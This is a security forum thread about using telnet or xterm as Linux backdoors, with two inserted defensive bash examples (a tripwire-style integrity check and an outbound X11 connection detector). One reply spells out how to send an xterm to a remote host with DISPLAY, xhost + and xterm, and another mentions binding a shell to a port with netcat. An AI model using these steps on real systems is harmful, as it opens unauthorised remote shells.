telnet/xterm backdoors??

  1. #1
    Senior Member br_fusion's Avatar
    Join Date
    Apr 2002
    Posts
    167

    telnet/xterm backdoors??

    Does anyone know if it is possible to make backdoors with telnet or xterm on a Linux system? I read somewhere that you could make telnet spit out a /bin/sh to a remote host.

    Also, I checked the man pages for both and found next to nothing.

    thanks
    The command completed successfully.


    "They drew first blood not me."

  2. #2
    Senior Member
    Join Date
    Jul 2003
    Posts
    114
    It's not a feature of telnet or xterm. Attackers replace the existing copies of the telnet/xterm/ssh/etc. programs with ones that more-or-less appear to work the same, but actually do something evil, in addition.

    Programs like tripwire will help detect these changes.
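
As an added illustration of the kind of check tripwire performs (not part of the original post, and not tripwire's own code): record hashes and permissions of the binaries while the system is known good, then compare later. The function names and the temp-dir stand-in files are constructed for the example; GNU sha256sum and stat are assumed.

```bash
#!/usr/bin/env bash
# Added example: a minimal tripwire-style integrity check (GNU coreutils assumed).

# record_baseline FILE... : print "sha256 mode:owner:group path" per file.
record_baseline() {
    local f
    for f in "$@"; do
        [ -f "$f" ] || continue
        printf '%s %s %s\n' "$(sha256sum < "$f" | cut -d' ' -f1)" \
            "$(stat -c '%a:%U:%G' "$f")" "$f"
    done
}

# verify_baseline BASELINE : report drift; exit status 1 if anything changed.
verify_baseline() {
    local hash meta path rc=0
    while read -r hash meta path; do
        if [ ! -f "$path" ]; then
            echo "MISSING $path"; rc=1; continue
        fi
        [ "$(sha256sum < "$path" | cut -d' ' -f1)" = "$hash" ] ||
            { echo "CONTENT $path"; rc=1; }
        [ "$(stat -c '%a:%U:%G' "$path")" = "$meta" ] ||
            { echo "PERMS $path"; rc=1; }
    done < "$1"
    return "$rc"
}

# Constructed demo: stand-in files in a temp dir, not the real system binaries.
demo_integrity() {
    local d; d=$(mktemp -d)
    printf 'original telnet\n' > "$d/telnet"
    printf 'original xterm\n'  > "$d/xterm"
    printf 'original ssh\n'    > "$d/ssh"
    chmod 755 "$d/telnet" "$d/xterm" "$d/ssh"
    record_baseline "$d/telnet" "$d/xterm" "$d/ssh" > "$d/baseline"
    printf 'replaced copy\n' > "$d/telnet"   # content swapped
    chmod 4755 "$d/xterm"                    # setuid bit added
    rm "$d/ssh"                              # file removed
    verify_baseline "$d/baseline" | sed "s|$d/||"
    rm -rf "$d"
}

demo_integrity
```

Keep the baseline file somewhere the monitored host cannot modify (read-only media or another machine); otherwise whoever replaces the binary can replace the baseline too.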

  3. #3
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356
    Think you may be referring to shoveling an XTERM back. The person would have to obtain some kind of access to your system first, but if you do not have a firewall/router blocking outgoing connections, they could send an exterminal back to their own pc, in essentially one command.

    To test for yourself, go to system1:
    DISPLAY=<system2>:0.0; export DISPLAY

    system2:
    xhost +system1

    system1:
    xterm & (or whatever the binary is on your system).

    You should notice that the xterm from system1 now appears on system2 as would any gui window executed from the same shell where you set your DISPLAY environment variable. Can be nice, but can be painful too...

    Also note, you could do the same thing if the system had rexec or rcmd running (you do have to change up the command line to tell the system where to pipe the xterm, but it works nonetheless).

    I would assume this is roughly what you are asking?

    /nebulus
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)
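
An added example, not part of the original post: since X display N listens on TCP port 6000+N, the xterm described above shows up on system1 as an outbound connection to port 6000 on system2, which can be spotted in `ss -tn` output. The function name and the sample lines (documentation addresses) are constructed; loopback peers are skipped because SSH X11 forwarding legitimately uses them.

```bash
#!/usr/bin/env bash
# Added example: flag established outbound connections to X11 display ports.

# Constructed sample in `ss -tn` layout (documentation address ranges).
SAMPLE_SS='State    Recv-Q Send-Q Local Address:Port   Peer Address:Port
ESTAB    0      0      192.0.2.10:51514     198.51.100.7:6000
ESTAB    0      0      192.0.2.10:22        203.0.113.5:40022
ESTAB    0      0      127.0.0.1:45678      127.0.0.1:6010
ESTAB    0      0      [2001:db8::10]:40000 [2001:db8::7]:6001
SYN-SENT 0      1      192.0.2.10:51600     198.51.100.7:6002'

# Reads `ss -tn` style lines on stdin and prints
# "local -> peer (display :N)" for each established connection whose
# peer port is an X11 display port (6000+N, N = 0..63).
find_outbound_x11() {
    awk '
        $1 != "ESTAB" { next }          # skips the header and half-open sockets
        {
            peer = $5
            n = split(peer, parts, ":") # last piece is the port, also for [v6]:port
            port = parts[n] + 0
            host = substr(peer, 1, length(peer) - length(parts[n]) - 1)
            if (port < 6000 || port > 6063) next
            if (host ~ /^127\./ || host == "[::1]") next   # local forwarding
            printf "%s -> %s (display :%d)\n", $4, peer, port - 6000
        }'
}

printf '%s\n' "$SAMPLE_SS" | find_outbound_x11
```

On a live host the input would come from `ss -tn | find_outbound_x11`. Blocking outbound TCP 6000-6063 at the firewall, as the post implies, closes the path instead of only reporting it.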

  4. #4
    Senior Member br_fusion's Avatar
    Join Date
    Apr 2002
    Posts
    167
    nebulus200 thanks for the help.

    Do you know any informative links where I could learn more?

  5. #5
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356
    Unfortunately no, most unix books should at least discuss it briefly...

    Here are the first few that turned up in google:

    http://www.bu.edu/cc/support/aboutun...ral/xterminal/
    http://bau2.uibk.ac.at/matic/xsecur.htm
    http://bau2.uibk.ac.at/matic/ccxsec.htm
    http://secinf.net/unix_security/Impr..._security.html

    /nebulus

  6. #6
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,884
    One place you can try is the Hacking Exposed 4 book by Foundstone. They discuss this in detail along with ways to prevent it. I know this isn't a link but I do know that the info you most likely want is in the book.
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  7. #7
    AO übergeek phishphreek's Avatar
    Join Date
    Jan 2002
    Posts
    4,325
    Thehorse13 is right, as usual. I read about that in Hacking Exposed. I have the third edition though.
    Maximum Linux Security also talks about it.

    It is also possible to use netcat to make telnet or xterm listen on any port of the attacker's choice...

    Most won't do this (hopefully)... as it will be open to anyone who tries to connect.
    Quitmzilla is a firefox extension that gives you stats on how long you have quit smoking, how much money you've saved, how much you haven't smoked and recent milestones. Very helpful for people who quit smoking and used to smoke at their computers... Helps out with the urges.

  8. #8
    Senior Member
    Join Date
    Oct 2001
    Posts
    872
    Originally posted here by phishphreek80
    It is also possible to use netcat to make telnet or xterm listen on any port of the attacker's choice...

    Most won't do this (hopefully)... as it will be open to anyone who tries to connect.

    Yes, that's exactly what I was going to suggest to him!

    Netcat is a tool of wonders. You may want to do some research on Cryptcat and/or Socat.
    ...This Space For Rent.

    -[WebCarnage]

  9. #9
    Junior Member
    Join Date
    Nov 2003
    Posts
    2
    I don't know anything on telneting. Could someone please tell me what it is and how to do it? [It would be appreciated] {thanks}
    Kyle Goode

  10. #10
    AO übergeek phishphreek's Avatar
    Join Date
    Jan 2002
    Posts
    4,325
    kyleiscool: You should do some searching of the forum, as this has been discussed time and time again. Below is a link to get you started. The search feature is at the top right of the main page.

    You can also find a lot of good info about telnet by using www.google.com

    The main thing you need to know is DON'T USE IT ACROSS THE INTERNET!

    It is by NO means secure... everything can be captured.

    If you are just exploring and learning how protocols work.. then fine, it is good for that.
    BUT, that's about it.

    You can use it on your trusted LAN... but there are far better alternatives... such as ssh (secure shell).

    http://www.antionline.com/showthread...hreadid=251708

    PS: I hope that isn't your real address that you put in your "location field" of your profile. Everyone can see that. It isn't wise to put your personal info up for the world to see... you make yourself an easy target for identity theft. or.. psycho serial killers... muhahaha muhahaha

    wow... you're only 13-14yrs old? maybe it's time your parents had a talk with you about what info NOT to give out while online. It's a very dangerous world... there are some very scary people out there. you should NEVER give out your info to ANYONE. Just like in the real world... you wouldn't tell a stranger where you live, would you?
